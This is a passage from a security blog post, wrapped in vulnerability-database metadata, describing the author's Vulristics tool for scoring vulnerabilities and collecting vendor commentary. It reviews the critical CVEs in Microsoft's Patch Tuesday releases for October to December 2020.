I had to get the comments from various Vulnerability Management vendors and researchers blogs (Tenable, Qualys, Rapid7, ZDI). I wanted this to be as much automated as possible. I have added some code to make CVE search requests on the Microsoft website for a date range (including the second Tuesday of the month). I also figured out how to make searches on the Vulnerability Management vendors blogs. So, now to get a Microsoft Patch Tuesday report it&#x27;s only necessary to set the year and month. \n\nSimple like this:\n \n \n import functions_report_ms_patch_tuesday_\n \n _functions_report_ms_patch_tuesday.make_ms_patch_tuesday_report(year=**\"2020\"**, month=**\"December\"**, rewrite_flag=True)\n\n## Vulristics Vulnerability Scoring (VVS)\n\nI decided that CVSS is not suitable for evaluating, sorting and comparing vulnerabilities. I needed something to automatically process hundreds vulnerabilities every month and to highlight the most critical ones. Finally, I decided to make my own scoring - Vulristics Vulnerability Scoring (VVS). \n\nDo you know the perfect formula for counting vulnerability criticality? Well, I don&#x27;t.  Any scoring that I can make will be subjective and will probably change over time. But at least I can make it transparent and easily changeable, so that everyone can make their own vulnerability scoring most appropriate for a particular organization.\n\nSuch scoring should consider \n\n * CVSS Base score \n * existence of the exploit\n * exploitability of the vulnerability in the wild\n * popularity of the vulnerable software \n * type of the vulnerability\n\nExamples: \n\n2\\.  **Elevation of Privilege** - Windows Kernel Local ([CVE-2020-17087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087>)) - Critical [628] \ncomponent| value| weight| comment \n---|---|---|--- \nExploited in the Wild| 1.0| 18| Exploitation in the wild is mentioned at Vulners ([AttackerKB](<https://vulners.com/attackerkb/AKB:B72B19ED-8E0B-4C11-9C2D-95A25BCC42A6>) object), [AttackerKB](<https://attackerkb.com/topics/y8mmBHc710/cve-2020-17087-windows-kernel-local-privilege-escalation-0day>), [Microsoft](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2020-17087>) \nPublic Exploit Exists| 0| 17| Public exploit is NOT found at Vulners website \nCriticality of Vulnerability Type| 0.5| 15| Elevation of Privilege \nVulnerable Product is Common| 1.0| 14| Windows component \nCVSS Base Score| 0.7| 10| NVD Vulnerability Severity Rating is High \n3\\.  **Elevation of Privilege** - Windows Print Spooler ([CVE-2020-17001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17001>)) - Critical [614] \ncomponent| value| weight| comment \n---|---|---|--- \nExploited in the Wild| 0| 18| Exploitation in the wild is NOT found at Vulners, Microsoft and AttackerKB websites \nPublic Exploit Exists| 1.0| 17| Public exploit is found at Vulners ([Microsoft Windows Local Spooler Bypass](<https://vulners.com/PACKETSTORM/PACKETSTORM:160028>)) \nCriticality of Vulnerability Type| 0.5| 15| Elevation of Privilege \nVulnerable Product is Common| 1.0| 14| Windows component \nCVSS Base Score| 0.7| 10| NVD Vulnerability Severity Rating is High \n \n### Exploitablity in The Wild and Vulners\n\nThe really interesting thing was to detect if the vulnerability is being exploited in real attacks. I made a post in my telegram channel asking for ideas. We can&#x27;t use Microsoft data directly because they do not update it after the initial vulnerability release. Other good sources are [AttackerKB by Rapid7](<https://attackerkb.com/>) and [US-CERT Bulletins](<https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>). \n\nI asked my friends from the Vulners team to add this feature and now you can [search for CVEs exploited in the wild](<https://vulners.com/search?query=enchantments.exploitation.wildExploited:true>) based on data from AttackerKB and US-CERT. \n\n\n\nAnd also this data is available in JSON format for the vulnerability:\n \n \n ... \n \"exploitation\": {\n \"wildExploited\": true,\n \"wildExploitedSources\": [\n {\n \"type\": \"cisa\",\n \"idList\": [\n \"CISA:2B970469D89016F563E142BE209443D8\",\n \"CISA:61F2653EF56231DB3AEC3A9E938133FE\",\n \"CISA:990FCFCEB1D9B60F5FAA47A1F537A3CB\"\n ]\n },\n {\n \"type\": \"attackerkb\",\n \"idList\": [\n \"AKB:7C5703D3-9E18-4F5C-A4D2-25E1F09B43CB\"\n ]\n }\n ],\n \"modified\": \"2020-12-25T13:57:26\"\n },\n ... \n \n\nI also added direct AttackerKB processing to Vulristics and some code to filter out false positives in &quot;Exploitablity in The Wild&quot;.\n\n### VM Vendor&#x27;s Comments \n\nWhat about VM Vendor&#x27;s Comments? Firstly I thought that the existence of the comment from the vendor should be taken into consideration when counting the vulnerability score. But then I decided that it&#x27;s a bad practice because the vendors are not who makes the criticality but they help you to test your scoring.\n\nFor example, if your score shows that some vulnerability is critical and vulnerability management vendors don&#x27;t mention it, this means that your scoring has some flaws or the experts of VM vendor don&#x27;t understand something. \n\n## Microsoft Patch Tuesdays Q4 2020\n\nNow let&#x27;s take a look on the Vulrisctics Microsoft Patch Tuesday reports for October, November and December 2020.\n\n### October 2020\n\n * All vulnerabilities: 87\n * Urgent: 0\n * Critical: 2\n * High: 20\n * Medium: 63\n * Low: 2\n\nIt has been an interesting month. \n\nMost of the VM vendors and researchers focused on &quot;**Remote Code Execution** - Windows TCP/IP ([CVE-2020-16898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>)) - High [500]&quot;, dubbed &quot;Bad Neighbor&quot;. It affects all supported versions of Windows OS, and maybe unsupported/earlier versions of Windows as well. Tenable wrote: &quot;According to a blog post from McAfee, Microsoft Active Protections Program (MAPP) members were provided with a test script that successfully demonstrates exploitation of this vulnerability to cause a denial of service (DoS). While the test scenario does not provide the ability to pivot to RCE, an attacker could craft a wormable exploit to achieve RCE. While an additional bug would be required to craft an exploit, it is likely that we will see proof-of-concept (PoC) code released in the near future.&quot; However, there has been no news since October.\n\nBut there is a more critical vulnerability with a public exploit &quot;**Remote Code Execution** - Microsoft SharePoint ([CVE-2020-16952](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16952>)) - Critical [640]&quot;. It was mentioned by all vendors, but without much emphasis.\n\nAnd the second critical vulnerability is &quot;**Elevation of Privilege** - Windows COM Server ([CVE-2020-16916](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16916>)) - Critical [628]&quot; for which there is a flag of exploitation in the wild in AttackerKB. How much can you believe it? Well AttackerKB is a crowdsourcing platform, so possibly it can be fake.\n\nFor many other vulnerabilities (including 19 RCEs), there are no exploits or signs of exploitation in the wild. Among them, much attention has been paid to RCE in Microsoft Outlook ([CVE-2020-16947](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16947>)). A quote from Tenable: &quot;Because Outlook\u2019s Preview Pane is affected by this flaw, a user does not have to open the message in order for the vulnerability to be exploited. As Outlook is widely used for enterprise email, we highly recommend prioritizing the patching of this CVE.&quot;\n\n### November 2020\n\n * All vulnerabilities: 112\n * Urgent: 0\n * Critical: 3\n * High: 17\n * Medium: 90\n * Low: 2\n\n2 vulnerabilities were critical because there is information about them that they are Exploited in the wild. \n\nAll VM vendors initially did not notice &quot;**Security Feature Bypass** - Kerberos KDC ([CVE-2020-17049](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17049>)) - Critical [709]&quot;, only ZDI wrote that they don&#x27;t understand what it is: &quot;What security feature in Kerberos is being bypassed? What is the likelihood?&quot;. But then a post appeared with a [detailed description of the exploitation](<https://blog.netspi.com/cve-2020-17049-kerberos-bronze-bit-attack/>). \n\nThe second critical is &quot;**Elevation of Privilege** - Windows Kernel Local ([CVE-2020-17087](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17087>)) - Critical [628]&quot;. It was used to escape Google Chrome\u2019s sandbox in order to elevate privileges on the exploited system.\n\nThe third critical vulnerability &quot;**Elevation of Privilege** - Windows Print Spooler ([CVE-2020-17001](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17001>)) - Critical [614]&quot; has a public exploit at Vulners ([Microsoft Windows Local Spooler Bypass](<https://vulners.com/PACKETSTORM/160028>)) \n\nMost of the comments this month were about &quot;**Remote Code Execution** - Windows Network File System ([CVE-2020-17051](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17051>)) - High [513]&quot;. A quote from Tenable: &quot;In a blog post by McAfee, there is speculation about combining **CVE-2020-17051** with CVE-2020-17056, a remote kernel data read vulnerability in NFS, in order to bypass address space layout randomization (ASLR), which could increase the probability of a remote exploit&quot;. But in fact, we did not see any attacks or exploits for this vulnerability.\n\nAlso worth mentioning RCEs in\n\n * Microsoft Exchange Server ([CVE-2020-17083](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17083>), [CVE-2020-17084](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17084>))\n * Windows Print Spooler ([CVE-2020-17042](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17042>))\n * Microsoft Excel ([CVE-2020-17019](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17019>), [CVE-2020-17064](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17064>), [CVE-2020-17065](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17065>), [CVE-2020-17066](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17066>))\n * Microsoft SharePoint ([CVE-2020-17061](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17061>))\n * Microsoft Teams ([CVE-2020-17091](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17091>))\n\nBut we did not see any attacks or exploits for them either.\n\n### December 2020\n\n * All vulnerabilities: 58\n * Urgent: 0\n * Critical: 1\n * High: 23\n * Medium: 30\n * Low: 4\n\nThere were no vulnerabilities with exploits. \n\nThe critical is only &quot;**Remote Code Execution** - Microsoft Exchange ([CVE-2020-17144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17144>)) - Critical [705]&quot;, because of AttackerKB. How realistic is this? You know, crowdsourcing. Rapid7: **CVE-2020-17144** which is another remote code execution vulnerability also stemming from improper validation for cmdlet arguments, this one only affects Exchange Server 2010 SP3 and does require additional user interaction to successfully execute&quot;. Besides this, there were many other Microsoft Exchange RCEs ([CVE-2020-17117](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17117>), [CVE-2020-17132](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17132>), [CVE-2020-17141](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17141>), [CVE-2020-17142](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17142>)).\n\nOther RCEs worth mentioning were in:\n\n * Windows NTFS ([CVE-2020-17096](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17096>)). Tenable: &quot;An RCE in Windows NT File System (NTFS), the file system used in Microsoft Windows and Microsoft Windows Server. No user interaction is required to exploit this vulnerability. Depending on the attacker\u2019s position, there are a few avenues for exploitation. For an attacker that has already established a local position on the vulnerable system, executing a malicious application that exploits the flaw would result in an elevation of privileges. Alternatively, a remote attacker could exploit the flaw by sending malicious requests to a vulnerable system, so long as they could access it over the Server Message Block version 2 protocol (SMBv2). Successful exploitation in this context would grant the attacker arbitrary code execution&quot;.\n * Hyper-V ([CVE-2020-17095](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17095>))\n * Microsoft SharePoint ([CVE-2020-17118](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17118>), [CVE-2020-17121](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17121>))\n * Microsoft Excel ([CVE-2020-17122](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17122>), [CVE-2020-17123](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17123>), [CVE-2020-17125](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17125>), [CVE-2020-17127](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17127>), [CVE-2020-17128](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17128>), [CVE-2020-17129](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-17129>))\n\nThank you, I will be glad to know your opinion about Vulristics and how it can be further improved. Write to <https://t.me/avleonovchat>.\n\nFull reports are available here:\n\n * [October 2020](<http://avleonov.com/vulristics_reports/october2020_report_avleonov_comments.html>)\n * [November 2020](<http://avleonov.com/vulristics_reports/november2020_report_avleonov_comments.html>)\n * [December 2020](<http://avleonov.com/vulristics_reports/december2020_report_avleonov_comments.html>)\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-11T01:50:44", "type": "avleonov", "title": "Vulristics Vulnerability Score, Automated Data Collection and Microsoft Patch Tuesdays Q4 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472", "CVE-2020-16898", "CVE-2020-16916", "CVE-2020-16947", "CVE-2020-16952", "CVE-2020-17001", "CVE-2020-17019", "CVE-2020-17042", "CVE-2020-17049", "CVE-2020-17051", "CVE-2020-17056", "CVE-2020-17061", "CVE-2020-17064", "CVE-2020-17065", "CVE-2020-17066", "CVE-2020-17083", "CVE-2020-17084", "CVE-2020-17087", "CVE-2020-17091", "CVE-2020-17095", "CVE-2020-17096", "CVE-2020-17117", "CVE-2020-17118", "CVE-2020-17121", "CVE-2020-17122", "CVE-2020-17123", "CVE-2020-17125", "CVE-2020-17127", "CVE-2020-17128", "CVE-2020-17129", "CVE-2020-17132", "CVE-2020-17141", "CVE-2020-17142", "CVE-2020-17144"], "modified": "2021-01-11T01:50:44", "id": "AVLEONOV:28E47C69DA4A069031694EB4C2C931BA", "href": "http://feedproxy.google.com/~r/avleonov/~3/mC48TITxRfM/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}